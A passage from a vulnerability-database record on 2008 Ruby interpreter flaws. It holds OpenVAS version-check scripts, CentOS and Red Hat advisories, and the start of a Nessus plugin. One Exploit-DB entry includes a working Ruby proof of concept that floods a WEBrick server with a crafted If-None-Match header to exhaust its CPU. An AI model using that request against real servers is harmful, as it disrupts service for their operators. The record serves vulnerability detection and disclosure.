ruby, ruby+pthreads, ruby+pthreads+oniguruma, ruby+oniguruma", "sourceData": "#\n#VID c329712a-6b5b-11dd-9d79-001fc61c2a55\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n ruby\n ruby+pthreads\n ruby+pthreads+oniguruma\n ruby+oniguruma\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/\nhttp://www.vuxml.org/freebsd/c329712a-6b5b-11dd-9d79-001fc61c2a55.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(61451);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"$Revision: 4175 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-29 07:45:50 +0200 (Thu, 29 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3905\");\n script_name(\"FreeBSD Ports: ruby, ruby+pthreads, ruby+pthreads+oniguruma, ruby+oniguruma\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ruby\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,1\")>=0 && revcomp(a:bver, b:\"1.8.6.287,1\")<0) {\n txt += 'Package ruby version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.9.*,1\")>=0) {\n txt += 'Package ruby version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ruby+pthreads\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,1\")>=0 && revcomp(a:bver, b:\"1.8.6.287,1\")<0) {\n txt += 'Package ruby+pthreads version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.9.*,1\")>=0) {\n txt += 'Package ruby+pthreads version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ruby+pthreads+oniguruma\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,1\")>=0 && revcomp(a:bver, b:\"1.8.6.287,1\")<0) {\n txt += 'Package ruby+pthreads+oniguruma version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.9.*,1\")>=0) {\n txt += 'Package ruby+pthreads+oniguruma version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ruby+oniguruma\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.*,1\")>=0 && revcomp(a:bver, b:\"1.8.6.287,1\")<0) {\n txt += 'Package ruby+oniguruma version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.9.*,1\")>=0) {\n txt += 'Package ruby+oniguruma version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "The remote host is missing an update to ruby1.8\nannounced via advisory DSA 1651-1.", "modified": "2017-07-07T00:00:00", "published": "2008-11-01T00:00:00", "id": "OPENVAS:61773", "href": "http://plugins.openvas.org/nasl.php?oid=61773", "type": "openvas", "title": "Debian Security Advisory DSA 1651-1 (ruby1.8)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1651_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1651-1 (ruby1.8)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\nKeita Yamaguchi discovered that several safe level restrictions\nare insufficiently enforced.\n\nCVE-2008-3656\n\nChristian Neukirchen discovered that the WebRick module uses\ninefficient algorithms for HTTP header splitting, resulting in\ndenial of service through resource exhaustion.\n\nCVE-2008-3657\n\nIt was discovered that the dl module doesn't perform taintness\nchecks.\n\nCVE-2008-3790\n\nLuka Treiber and Mitja Kolsek discovered that recursively nested\nXML entities can lead to denial of service through resource\nexhaustion in rexml.\n\nCVE-2008-3905\n\nTanaka Akira discovered that the resolv module uses sequential\ntransaction IDs and a fixed source port for DNS queries, which\nmakes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.8.5-4etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.7.72-1.\n\nWe recommend that you upgrade your ruby1.8 packages.\";\ntag_summary = \"The remote host is missing an update to ruby1.8\nannounced via advisory DSA 1651-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201651-1\";\n\n\nif(description)\n{\n script_id(61773);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-01 01:55:10 +0100 (Sat, 01 Nov 2008)\");\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1651-1 (ruby1.8)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ri1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-elisp\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-examples\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-dev\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8-dbg\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.8\", ver:\"1.8.5-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "The remote host is missing an update to ruby1.9\nannounced via advisory DSA 1652-1.", "modified": "2017-07-07T00:00:00", "published": "2008-11-01T00:00:00", "id": "OPENVAS:61774", "href": "http://plugins.openvas.org/nasl.php?oid=61774", "type": "openvas", "title": "Debian Security Advisory DSA 1652-1 (ruby1.9)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1652_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1652-1 (ruby1.9)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\nKeita Yamaguchi discovered that several safe level restrictions\nare insufficiently enforced.\n\nCVE-2008-3656\n\nChristian Neukirchen discovered that the WebRick module uses\ninefficient algorithms for HTTP header splitting, resulting in\ndenial of service through resource exhaustion.\n\nCVE-2008-3657\n\nIt was discovered that the dl module doesn't perform taintness\nchecks.\n\nCVE-2008-3790\n\nLuka Treiber and Mitja Kolsek discovered that recursively nested\nXML entities can lead to denial of service through resource\nexhaustion in rexml.\n\nCVE-2008-3905\n\nTanaka Akira discovered that the resolv module uses sequential\ntransaction IDs and a fixed source port for DNS queries, which\nmakes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.9.0+20060609-1etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.9.0.2-6.\n\nWe recommend that you upgrade your ruby1.9 packages.\";\ntag_summary = \"The remote host is missing an update to ruby1.9\nannounced via advisory DSA 1652-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201652-1\";\n\n\nif(description)\n{\n script_id(61774);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-11-01 01:55:10 +0100 (Sat, 01 Nov 2008)\");\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1652-1 (ruby1.9)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"rdoc1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-examples\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-elisp\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9-dbg\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-dev\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-12-20T18:26:14", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0981\n\n\nRuby is an extensible, interpreted, object-oriented, scripting language. It\nhas features to process text files and to do system management tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially-crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain a\ncorrect patch that resolves this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027503.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027504.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027511.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027512.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027552.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027553.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-irb\nruby-libs\nruby-mode\nruby-rdoc\nruby-ri\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0981.html", "edition": 3, "modified": "2008-12-23T15:38:41", "published": "2008-12-05T16:16:47", "href": "http://lists.centos.org/pipermail/centos-announce/2008-December/027503.html", "id": "CESA-2008:0981", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:26:44", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0897\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of service\nattack via XML documents with large XML entity definitions recursion. A\nspecially-crafted XML file could cause a Ruby application using the REXML\nmodule to use an excessive amount of CPU and memory. (CVE-2008-3790)\n\nAn insufficient \"taintness\" check flaw was discovered in Ruby's DL module,\nwhich provides direct access to the C language functions. An attacker could\nuse this flaw to bypass intended safe-level restrictions by calling\nexternal C functions with the arguments from an untrusted tainted inputs.\n(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially-crafted HTTP request to a\nWEBrick server that would cause the server to use an excessive amount of\nCPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027378.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027379.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027383.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027387.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027392.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027393.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-irb\nruby-libs\nruby-mode\nruby-rdoc\nruby-ri\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0897.html", "edition": 5, "modified": "2008-10-28T10:37:20", "published": "2008-10-24T00:04:31", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/027378.html", "id": "CESA-2008:0897", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3656", "CVE-2008-4310"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It\nhas features to process text files and to do system management tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially-crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain a\ncorrect patch that resolves this issue.", "modified": "2017-09-08T12:09:30", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:0981", "href": "https://access.redhat.com/errata/RHSA-2008:0981", "type": "redhat", "title": "(RHSA-2008:0981) Moderate: ruby security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-11T13:31:17", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1145", "CVE-2008-3443", "CVE-2008-3655", "CVE-2008-3656", "CVE-2008-3657", "CVE-2008-3790", "CVE-2008-3905"], "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of service\nattack via XML documents with large XML entity definitions recursion. A\nspecially-crafted XML file could cause a Ruby application using the REXML\nmodule to use an excessive amount of CPU and memory. (CVE-2008-3790)\n\nAn insufficient \"taintness\" check flaw was discovered in Ruby's DL module,\nwhich provides direct access to the C language functions. An attacker could\nuse this flaw to bypass intended safe-level restrictions by calling\nexternal C functions with the arguments from an untrusted tainted inputs.\n(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially-crafted HTTP request to a\nWEBrick server that would cause the server to use an excessive amount of\nCPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2017-09-08T11:51:21", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0897", "href": "https://access.redhat.com/errata/RHSA-2008:0897", "type": "redhat", "title": "(RHSA-2008:0897) Moderate: ruby security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T16:28:31", "description": "Ruby 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS. CVE-2008-3656,CVE-2008-4310. Dos exploits for multiple platform", "published": "2008-08-11T00:00:00", "type": "exploitdb", "title": "Ruby <= 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "modified": "2008-08-11T00:00:00", "id": "EDB-ID:32222", "href": "https://www.exploit-db.com/exploits/32222/", "sourceData": "source: http://www.securityfocus.com/bid/30644/info\r\n\r\nRuby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:\r\n\r\n- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.\r\n\r\n- An error affecting 'WEBrick::HHTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.\r\n\r\n- A flaw in 'dl' can allow attackers to call unauthorized functions.\r\n\r\nAttackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.\r\n\r\nThese issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable. \r\n\r\n#-- Exploitable Server --\r\n# require 'webrick'\r\n# WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => \"/etc\").start\r\n\r\n#-- Attack --\r\nrequire 'net/http'\r\nres = Net::HTTP.start(\"localhost\", 2000) { |http|\r\n req = Net::HTTP::Get.new(\"/passwd\")\r\n req['If-None-Match'] = %q{meh=\"\"} + %q{foo=\"bar\" } * 100\r\n http.request(req)\r\n}\r\np res\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/32222/"}], "nessus": [{"lastseen": "2021-01-17T12:44:17", "description": "From Red Hat Security Advisory 2008:0981 :\n\nUpdated ruby packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain\na correct patch that resolves this issue.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 / 5 : ruby (ELSA-2008-0981)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:irb", "p-cpe:/a:oracle:linux:ruby-irb", "p-cpe:/a:oracle:linux:ruby-ri", "p-cpe:/a:oracle:linux:ruby-devel", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:ruby", "p-cpe:/a:oracle:linux:ruby-docs", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:ruby-tcltk", "p-cpe:/a:oracle:linux:ruby-libs", "p-cpe:/a:oracle:linux:ruby-rdoc", "p-cpe:/a:oracle:linux:ruby-mode"], "id": "ORACLELINUX_ELSA-2008-0981.NASL", "href": "https://www.tenable.com/plugins/nessus/67767", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0981 and \n# Oracle Linux Security Advisory ELSA-2008-0981 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67767);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n 